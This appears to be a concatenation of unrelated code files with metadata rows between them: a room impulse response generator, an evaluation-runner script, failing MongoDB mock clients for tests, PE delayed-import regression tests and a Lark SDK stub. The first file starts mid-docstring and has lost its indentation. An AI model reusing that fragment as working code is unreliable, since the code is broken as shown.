.. seealso:: :func:`pyrirgen.RirGenerator`
.. seealso:: :url:https://github.com/ehabets/RIR-Generator/blob/master/rir_generator.cpp
>>> ### DOCTEST ###
>>> room = np.array([4,7,3]).reshape(3,1)
>>> source_loc = np.random.uniform(0,1,(3,2)) * room
>>> mic_loc = np.random.uniform(0,1,(3,4)) * room
>>> t60=0.3
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60)
>>> #import matplotlib.pyplot as plt
>>> #plt.plot(rirs_np[0,0,:] , label='rir for src1 and mic1')
>>> croom = cupy.array(room)
>>> csource_loc = cupy.array(source_loc)
>>> cmic_loc = cupy.array(mic_loc)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, t60=t60)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> beta = np.random.uniform(0.1, 0.9, size=6)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, beta=beta, t60=None)
>>> cbeta = cupy.array(beta)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, beta=cbeta, t60=None)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
"""
# xp = cupy.get_array_module(room, source_loc, mic_loc, beta)
    xp = np
if beta is None and t60 is None:
raise Exception('Either t60 or beta array must be provided')
elif beta is None:
V = xp.prod(room)
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * xp.log(10) / (c * S * t60)
if alpha < 1:
beta = xp.ones(6, ) * xp.sqrt(1 - alpha)
else:
raise Exception('t60 value {} too small for the room'.format(t60))
else:
if xp.max(beta) >= 1.0 or xp.min(beta) <= 0.0:
raise Exception('beta array values should be in the interval (0,1).')
if t60 is not None:
print('Overwriting provided t60 value using provided beta array')
alpha = 1 - beta**2
V = xp.prod(room)
Se = 2 * (room[1] * room[2] * (alpha[0] + alpha[1]) + room[0] * room[2] * (alpha[2] + alpha[3]) + room[0] * room[1] * (alpha[4] + alpha[5]))
        t60 = 24 * xp.log(10.0) * V / (c * Se)
if htw is None:
htw = np.minimum(32, int(xp.min(room) / 10 / c * fs))
tw_idx = xp.arange(0, 2 * htw).reshape(2 * htw, 1)
try:
assert(xp.all(room.T - mic_loc.T > 0) and xp.all(room.T - source_loc.T > 0))
assert(xp.all(mic_loc.T > 0) and xp.all(source_loc.T > 0))
    except AssertionError:
        raise Exception('Room dimensions and source and mic locations are not compatible.')
cTs = c / fs
# convert distances in meters to time-delays in samples
room = room / cTs
mic_loc = mic_loc / cTs
src_loc = source_loc / cTs
nmic = mic_loc.shape[-1]
nsrc = source_loc.shape[-1]
if nsamples is None:
nsamples = int(fs * t60)
def get_reflection_candidates():
nxrefl = int(nsamples / (room[0]))
nyrefl = int(nsamples / (room[1]))
nzrefl = int(nsamples / (room[2]))
xro = xp.arange(-nxrefl, nxrefl + 1)
yro = xp.arange(-nyrefl, nyrefl + 1)
zro = xp.arange(-nzrefl, nzrefl + 1)
xr = xro.reshape(2 * nxrefl + 1, 1, 1)
yr = yro.reshape(1, 2 * nyrefl + 1, 1)
zr = zro.reshape(1, 1, 2 * nzrefl + 1)
RoughDelays = xp.sqrt((2 * xr * room[0]) ** 2 + (2 * yr * room[1]) ** 2 + (2 * zr * room[2]) ** 2)
RoughGains = (beta[0] * beta[1]) ** xp.abs(xr) * (beta[2] * beta[3]) ** xp.abs(yr) * (beta[4] * beta[5]) ** xp.abs(zr) / (
RoughDelays + 0.5 / c * fs) # assume src-mic distance at least .5 metres
maxgain = xp.max(RoughGains)
vreflidx = xp.vstack(xp.nonzero(xp.logical_and(RoughDelays < nsamples, RoughGains > maxgain / 1.0e4)))
nrefl = vreflidx.shape[-1]
reflidx = xp.arange(nrefl).reshape(1, 1, nrefl, 1, 1, 1)
xrefl = xro[vreflidx[..., reflidx][0]]
yrefl = yro[vreflidx[..., reflidx][1]]
zrefl = zro[vreflidx[..., reflidx][2]]
return xrefl, yrefl, zrefl
xrefl, yrefl, zrefl = get_reflection_candidates()
def get_delays_and_gains():
xside = xp.arange(0, 2).reshape(1, 1, 1, 2, 1, 1)
yside = xp.arange(0, 2).reshape(1, 1, 1, 1, 2, 1)
zside = xp.arange(0, 2).reshape(1, 1, 1, 1, 1, 2)
imic = xp.arange(nmic).reshape(1, nmic, 1, 1, 1, 1)
isrc = xp.arange(nsrc).reshape(nsrc, 1, 1, 1, 1, 1)
Delays = xp.sqrt((2 * xrefl * room[0] - mic_loc[0, imic] + (1 - 2 * xside) * src_loc[0, isrc]) ** 2 + (2 * yrefl * room[1] - mic_loc[1, imic] + (1 - 2 * yside) * src_loc[1, isrc]) ** 2 + (2 * zrefl * room[2] - mic_loc[2, imic] + (1 - 2 * zside) * src_loc[2, isrc]) ** 2)
Refl_x = beta[0] ** (xp.abs(xrefl - xside)) * beta[1] ** (xp.abs(xrefl))
Refl_y = beta[2] ** (xp.abs(yrefl - yside)) * beta[3] ** (xp.abs(yrefl))
Refl_z = beta[4] ** (xp.abs(zrefl - zside)) * beta[5] ** (xp.abs(zrefl))
Gains = Refl_x * Refl_y * Refl_z / (4 * np.pi * Delays * cTs)
# Gains[Delays > nsamples] = 0.0
return Delays, Gains
Delays, Gains = get_delays_and_gains()
rirs = xp.zeros((nsrc, nmic, nsamples), dtype=np.float32)
for src in xp.arange(nsrc):
for mic in xp.arange(nmic):
dnow = Delays[src, mic, ...].flatten()
gnow = Gains[src, mic, ...].flatten()
if method == 1:
gnow = gnow[dnow < nsamples - htw - 2]
dnow = dnow[dnow < nsamples - htw - 2]
dnow_floor = xp.floor(dnow)
dnow_dist = dnow - dnow_floor
dnow_floor = dnow_floor.reshape(1, dnow.shape[0])
dnow_dist = dnow_dist.reshape(1, dnow.shape[0])
gnow = gnow.reshape(1, dnow.shape[0])
dnow_ext = dnow_floor + tw_idx - htw + 1
garg = np.pi * (-dnow_dist + 1 + tw_idx - htw)
gnow_ext = gnow * 0.5 * (1.0 - xp.cos(np.pi + garg / htw)) * xp.where(garg == 0.0, 1.0, xp.sin(garg) / garg)
                dnow = dnow_ext.flatten().astype(np.int32)
                gnow = gnow_ext.flatten().astype(np.float32)
                # keep only in-range sample indices; casting to uint32 would
                # wrap negative indices around and scatter gains out of bounds
                dvalid = xp.logical_and(dnow >= 0, dnow < nsamples)
                gnow = gnow[dvalid]
                dnow = dnow[dvalid]
                rirnow = xp.zeros((nsamples,), dtype=np.float32)
if xp == np:
np.add.at(rirnow, dnow, gnow)
else:
xp.scatter_add(rirnow, dnow, gnow)
rirs[src, mic, ...] = rirnow
elif method == 2: ## this is too slow and may not be accurate as well
gnow = gnow[dnow < nsamples]
dnow = dnow[dnow < nsamples]
frange = xp.arange(0, 0.5 + 0.5 / nsamples, 1.0 / nsamples)
rirfft = xp.zeros(frange.shape, dtype=np.complex128)
for i in range(len(frange)):
rirfft[i] = xp.sum(gnow * xp.exp(-1j * 2 * np.pi * frange[i] * dnow))
rirs[src, mic, :] = xp.real(xp.fft.irfft(rirfft)).astype(dtype=np.float32)
if hpfilt:
        rirs[:, :, 1:-1] += -0.5 * rirs[:, :, 2:] - 0.5 * rirs[:, :, :-2]
return rirs
| 51.418231 | 329 | 0.53788 | 2,788 | 19,179 | 3.630201 | 0.10868 | 0.010078 | 0.007707 | 0.004743 | 0.957712 | 0.957415 | 0.957415 | 0.948029 | 0.948029 | 0.948029 | 0 | 0.054594 | 0.313311 | 19,179 | 372 | 330 | 51.556452 | 0.713895 | 0.283435 | 0 | 0.870445 | 0 | 0 | 0.040547 | 0 | 0 | 0 | 0 | 0 | 0.016194 | 1 | 0.032389 | false | 0 | 0.008097 | 0 | 0.072874 | 0.008097 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6df0e694953766d35046fcf71b758062d04cd776 | 530 | py | Python | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_0_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_1_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_2_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_3_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_4_MedianBlur.yml",
]
for l in ls:
os.system(l) | 48.181818 | 100 | 0.843396 | 80 | 530 | 5.2125 | 0.3 | 0.119904 | 0.143885 | 0.227818 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0 | 0.0501 | 0.058491 | 530 | 11 | 101 | 48.181818 | 0.785571 | 0 | 0 | 0 | 0 | 0 | 0.875706 | 0.640301 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0987c5978494d48b51c857daf561d862cf9863fb | 7,041 | py | Python | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 3,895 | 2015-03-16T18:52:44.000Z | 2022-03-31T01:43:56.000Z | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 710 | 2015-03-26T11:45:42.000Z | 2022-03-31T21:51:08.000Z | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 401 | 2015-03-18T14:34:42.000Z | 2022-03-05T23:26:50.000Z | import mongomock
import pymongo
import pymongo.errors
class FailingMongoClient(mongomock.MongoClient):
def __init__(
self,
max_calls_before_failure=2,
exception_to_raise=pymongo.errors.AutoReconnect,
**kwargs,
):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self.exception_to_raise = exception_to_raise
self._exception_to_raise = exception_to_raise
def get_database(
self, name=None, codec_options=None, read_preference=None, write_concern=None
):
if name is None:
return self.get_default_database()
db = self._database_accesses.get(name)
if db is None:
db_store = self._store[name]
db = self._database_accesses[name] = FailingDatabase(
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
client=self,
name=name,
read_preference=read_preference or self.read_preference,
codec_options=self._codec_options,
_store=db_store,
)
return db
class FailingDatabase(mongomock.Database):
def __init__(self, max_calls_before_failure, exception_to_raise=None, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self._exception_to_raise = exception_to_raise
def get_collection(
self,
name,
codec_options=None,
read_preference=None,
write_concern=None,
read_concern=None,
):
try:
return self._collection_accesses[name].with_options(
codec_options=codec_options or self._codec_options,
read_preference=read_preference or self.read_preference,
read_concern=read_concern,
write_concern=write_concern,
)
except KeyError:
self._ensure_valid_collection_name(name)
collection = self._collection_accesses[name] = FailingCollection(
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
database=self,
name=name,
write_concern=write_concern,
read_preference=read_preference or self.read_preference,
codec_options=codec_options or self._codec_options,
_db_store=self._store,
)
return collection
class FailingCollection(mongomock.Collection):
def __init__(self, max_calls_before_failure, exception_to_raise, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self._exception_to_raise = exception_to_raise
self._calls = 0
def insert_one(self, document, session=None):
self._calls += 1
if self._calls > self._max_calls_before_failure:
raise pymongo.errors.ConnectionFailure
else:
return super().insert_one(document)
def update_one(self, filter, update, upsert=False, session=None):
self._calls += 1
if self._calls > self._max_calls_before_failure:
raise pymongo.errors.ConnectionFailure
else:
return super().update_one(filter, update, upsert)
class ReconnectingMongoClient(FailingMongoClient):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def get_database(
self, name=None, codec_options=None, read_preference=None, write_concern=None
):
if name is None:
return self.get_default_database()
db = self._database_accesses.get(name)
if db is None:
db_store = self._store[name]
db = self._database_accesses[name] = ReconnectingDatabase(
max_calls_before_reconnect=self._max_calls_before_reconnect,
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
client=self,
name=name,
read_preference=read_preference or self.read_preference,
codec_options=self._codec_options,
_store=db_store,
)
return db
class ReconnectingDatabase(FailingDatabase):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def get_collection(
self,
name,
codec_options=None,
read_preference=None,
write_concern=None,
read_concern=None,
):
try:
return self._collection_accesses[name].with_options(
codec_options=codec_options or self._codec_options,
read_preference=read_preference or self.read_preference,
read_concern=read_concern,
write_concern=write_concern,
)
except KeyError:
self._ensure_valid_collection_name(name)
collection = self._collection_accesses[name] = ReconnectingCollection(
max_calls_before_reconnect=self._max_calls_before_reconnect,
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
database=self,
name=name,
write_concern=write_concern,
read_preference=read_preference or self.read_preference,
codec_options=codec_options or self._codec_options,
_db_store=self._store,
)
return collection
class ReconnectingCollection(FailingCollection):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def insert_one(self, document, session=None):
self._calls += 1
if self._is_in_failure_range():
print(self.name, "insert no connection")
raise self._exception_to_raise
else:
print(self.name, "insert connection reestablished")
return mongomock.Collection.insert_one(self, document)
def update_one(self, filter, update, upsert=False, session=None):
self._calls += 1
if self._is_in_failure_range():
print(self.name, "update no connection")
raise self._exception_to_raise
else:
print(self.name, "update connection reestablished")
return mongomock.Collection.update_one(self, filter, update, upsert)
def _is_in_failure_range(self):
return (
self._max_calls_before_failure
< self._calls
<= self._max_calls_before_reconnect
)
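The collections above gate failures on a simple call counter: calls succeed up to `max_calls_before_failure`, raise until `max_calls_before_reconnect`, then succeed again. A dependency-free sketch of the same pattern (the `FlakyStore` name is ours, for illustration only):

```python
class FlakyStore:
    # minimal stand-in for FailingCollection/ReconnectingCollection:
    # fail inside a window of call counts, succeed outside it
    def __init__(self, max_calls_before_failure, max_calls_before_reconnect):
        self._fail_after = max_calls_before_failure
        self._reconnect_after = max_calls_before_reconnect
        self._calls = 0

    def insert_one(self, document):
        self._calls += 1
        if self._fail_after < self._calls <= self._reconnect_after:
            raise ConnectionError("no connection")
        return document

store = FlakyStore(max_calls_before_failure=1, max_calls_before_reconnect=3)
results = []
for i in range(5):
    try:
        results.append(store.insert_one({"n": i}))
    except ConnectionError:
        results.append(None)
# results: call 1 succeeds, calls 2-3 fail, calls 4-5 succeed again
```

This is the behavior an observer's retry logic is tested against: the exception window simulates a dropped connection that later recovers.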
| 36.863874 | 85 | 0.644795 | 762 | 7,041 | 5.486877 | 0.093176 | 0.065056 | 0.113848 | 0.094714 | 0.878737 | 0.847644 | 0.833772 | 0.826118 | 0.826118 | 0.818464 | 0 | 0.001192 | 0.285045 | 7,041 | 190 | 86 | 37.057895 | 0.82936 | 0 | 0 | 0.751515 | 0 | 0 | 0.014487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.018182 | 0.006061 | 0.224242 | 0.024242 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09bd03ef0492019dbe018fc1db7fc819e39c3c3a | 14,187 | py | Python | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | from regression_tests import *
class Test001(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='dropped.ex'
)
def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '80')
self.assertEqual(self.fileinfo.output['importTable']['md5'], '6f94503e98785a3637bc2177cce10427')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['index'], '69')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['index'], '72')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['index'], '73')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['index'], '74')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['index'], '75')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['index'], '76')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['index'], '77')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['index'], '78')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['index'], '79')
assert 'name' not in self.fileinfo.output['importTable']['imports'][69]
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['name'], 'GetInputState')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['name'], 'wsprintfA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['name'], 'PostThreadMessageA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['name'], 'GetMessageA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['name'], 'GetDesktopWindow')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['name'], 'RegOpenKeyExA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['name'], 'RegCloseKey')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['name'], 'RegQueryValueExA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['address'], '0x40911c')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['address'], '0x4020ae')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['address'], '0x402078')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['address'], '0x40209c')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['address'], '0x40208a')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['address'], '0x402058')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['address'], '0x4020f2')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['address'], '0x4020c0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['address'], '0x4020e0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['ordinalNumber'], '20')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['delayed'], 'false')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['delayed'], 'true')
class Test002(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='delay_loaded_dlls_by_va_32bit.ex_'
)
    def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '31')
self.assertEqual(self.fileinfo.output['importTable']['md5'], 'c64d18c2324195b6f30e544ac4d0793a')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x400a00')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'GetModuleHandleA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '294')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['delayed'], 'false')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x400708')
assert 'name' not in self.fileinfo.output['importTable']['imports'][25]
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['ordinalNumber'], '17')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x4006e8')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['name'], 'InitCommonControlsEx')
assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][26]
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['index'], '27')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['address'], '0x40075e')
assert 'name' not in self.fileinfo.output['importTable']['imports'][27]
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['ordinalNumber'], '115')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['delayed'], 'true')


class Test003(Test):
    settings = TestSettings(
        tool='fileinfo',
        args='--verbose --json',
        input='delay_loaded_dlls_rva_32bit.ex_'
    )

    def test_delayed_imports_detection(self):
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '31')
        self.assertEqual(self.fileinfo.output['importTable']['md5'], '7877a03959578abdcfd18f857518208c')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x400c00')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'WaitForSingleObject')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '1124')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['delayed'], 'false')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x4006ec')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['name'], 'InitCommonControlsEx')
        assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][25]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'COMCTL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x4006d1')
        assert 'name' not in self.fileinfo.output['importTable']['imports'][26]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['ordinalNumber'], '17')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['index'], '27')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['libraryName'], 'WS2_32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['address'], '0x400727')
        assert 'name' not in self.fileinfo.output['importTable']['imports'][27]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['ordinalNumber'], '115')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['delayed'], 'true')


class Test004(Test):
    settings = TestSettings(
        tool='fileinfo',
        args='--verbose --json',
        input='delay_loaded_dlls_rva_64bit.ex_'
    )

    def test_delayed_imports_detection(self):
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '30')
        self.assertEqual(self.fileinfo.output['importTable']['md5'], '68592d0426806874d10b4c28d9c5cd40')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x140001000')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'WaitForSingleObject')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '1128')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['index'], '24')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['libraryName'], 'COMCTL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['address'], '0x1400009b7')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['name'], 'InitCommonControlsEx')
        assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][24]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['delayed'], 'true')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x140000932')
        assert 'name' not in self.fileinfo.output['importTable']['imports'][25]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['ordinalNumber'], '17')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'WS2_32.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x140000a60')
        assert 'name' not in self.fileinfo.output['importTable']['imports'][26]
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['ordinalNumber'], '115')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')


class Test005(Test):
    settings = TestSettings(
        tool='fileinfo',
        args='--verbose --json',
        input='delayimports.ex'
    )

    def test_delayed_imports_detection(self):
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '4')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['address'], '0x401150')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['index'], '3')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['libraryName'], 'msvcrt.dll')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['name'], 'printf')
        self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['delayed'], 'true')
        self.assertEqual(self.fileinfo.output['importTable']['md5'], '4e7b7b5b63ae609e9707b4896498325d')
# -*- coding: UTF-8 -*-
# Code generated by lark suite oapi sdk gen
from typing import *

from ....api import Request as APIRequest, Response as APIResponse, set_timeout, set_tenant_key, set_user_access_token, set_path_params, \
    set_query_params, set_response_stream, set_is_response_stream, FormData, FormDataFile
from ....config import Config
from ....consts import ACCESS_TOKEN_TYPE_TENANT, ACCESS_TOKEN_TYPE_USER, ACCESS_TOKEN_TYPE_APP

from .model import *


class Service(object):
    def __init__(self, conf):
        # type: (Config) -> None
        self.conf = conf
        self.tasks = TaskService(self)
        self.task_comments = TaskCommentService(self)
